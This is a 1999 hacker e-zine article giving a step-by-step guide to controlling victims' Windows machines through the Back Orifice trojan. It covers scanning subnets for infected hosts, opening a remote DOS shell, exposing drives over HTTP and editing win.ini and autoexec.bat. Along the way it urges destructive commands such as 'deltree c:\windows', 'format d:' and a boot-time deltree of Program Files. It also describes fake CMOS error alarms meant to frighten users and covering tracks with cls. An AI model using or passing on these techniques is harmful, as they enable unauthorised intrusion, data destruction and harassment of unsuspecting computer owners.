_________ SWAT MAGAZINE ISSUE FIFTEEN: MARCH 1999 __________ / \___________________________________________/ \ / Getting started with Back Orifice \ / By Mister Damage \ ----------------------------------------------------------------------- 1. Finding a victim 2. Telneting a hard drive 3. HTTP Enabling 4. Fun with win.ini and autoexec.bat 1. Finding a victim Load up bogui.exe In the target host:port box, enter an ip subnet to scan for i.e 194.168.60.* always include the wildcard, as this tells bogui to scan Click Send, and wait, if you find a victim, something like this will show: *** Beginning ping sweep of 194.168.70.* ---------- Packet received from host 194.168.70.140 port 31337 -------- !PONG!1.20!DEFAULT! ------------------------- End of Data ------------------- *** Site found: 194.168.70.140 and now the fun begins.... 2. Telneting a hard drive Load up bogui.exe and boclient.exe Find a victim and remember the full ip In the boclient, type in: host Then type appadd command.com 23 you should get some text come up, saying you got a response etc etc Load up telnet, and connect to the ip address thru port 23 If this is succesful, you should get a DOS session start thru telnet Remember: you cant run any external programs thru the telnet session, for example the command edit autoexec.bat will not work however, you can use the commands included in the command.com, such as attrib -r -h system.dat deltree c:\windows format d: use your imagination :) 3. HTTP Enabling Load up bogui.exe and find a victim Enter the full ip address into the target host box Select http enable from the command list In the box on the left that says Port, enter a port number, this can be anything Click send, you should get a response saying http has been enabled on Load up your web browser, i recommend using Netscape.... Enter the ip and port like this: http://: If it has worked the victims hard drives and cd-roms should be listed like an ftp site Click on C:\ for example, and it will list all files and directories, at the bottom of the page there will be a box for uploading files.... 4. Fun with win.ini and autoexec.bat Once you have your BO victim, its far more fun to fiddle with their system files and give em a scare than to totally destroy their hd(s) Great fun can be had with the win.ini file, look for lines like this: SHELL=EXPLORER.EXE and change to: SHELL=PROGMAN.EXE to give that Windows 3.1 flavour..... Or how about changing their desktop? Make your own background, say fucked.bmp, upload to their hd and look for this line: Wallpaper=tiles.bmp becomes: Wallpaper=fucked.bmp When they restart, your wallpaper will be on their desktop :) The win.ini is fairly self-explanatory, look for lines like these, and use your imagination: iCountry=44 NullPort=None sLongDate=dd MMMM yyyy sShortDate=dd/MM/yy bmp=C:\Progra~1\Access~1\mspaint.exe ^.bmp ZIP=C:\PROGRA~1\WINZIP\winzip32.exe ^.ZIP The Autoexec.bat requires some knowledge of DOS, but just as much fun can be had.... For example, the prompt command... The prompt command is a little feature built into DOS that enables you to change the appearence of the DOS prompt simply by typing prompt the prompt uses a simple code, the default is this: prompt $p$g which gives C:\> however, type in prompt this computer has been fucked and their prompt will be: this computer has been fucked there are plenty of things that can be added on as well: prompt this$_computer$_has$_been$_fucked will give a prompt like this: this computer has been fucked the $_ command makes the prompt move onto the next line another little feature of DOS is the ctrl+ commands, so typing prompt ctrl+A (which will appear as prompt ^A) gives a prompt of a little smiley face... fiddle about with the ctrl + command to see what else their is, but the most annoying of these is prompt ctrl+G ctrl+g makes the internal pc speaker beep, so adding the line: prompt WARNING! MEMORY ALLOCATION ERROR!$_CMOS RESETING TO DEFAULT^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G^G is gonna scare this shit out of your average pc user, who knows nothing about DOS, hes gonna crap himself when he switches on his pc and it beeps at him 50 times, ive also heard that pasting that about 500 times makes the pc lock up, and even if it doesnt, EVERYTIME you enter a command on the DOS prompt, its gonna beep, and the same goes for the ctrl+c (cancel last command), HIGHLY irritating But use your imagination, and see what you can do, its a simple matter to make the autoexec.bat attempt a hard drive format on boot up, remember, the autoexec.bat will execute a command like a DOS prompt, so adding things like: deltree c:\"program files"\ /y is gonna make sure somebody has a really bad day..... p.s make use of the cls command to cover your tracks....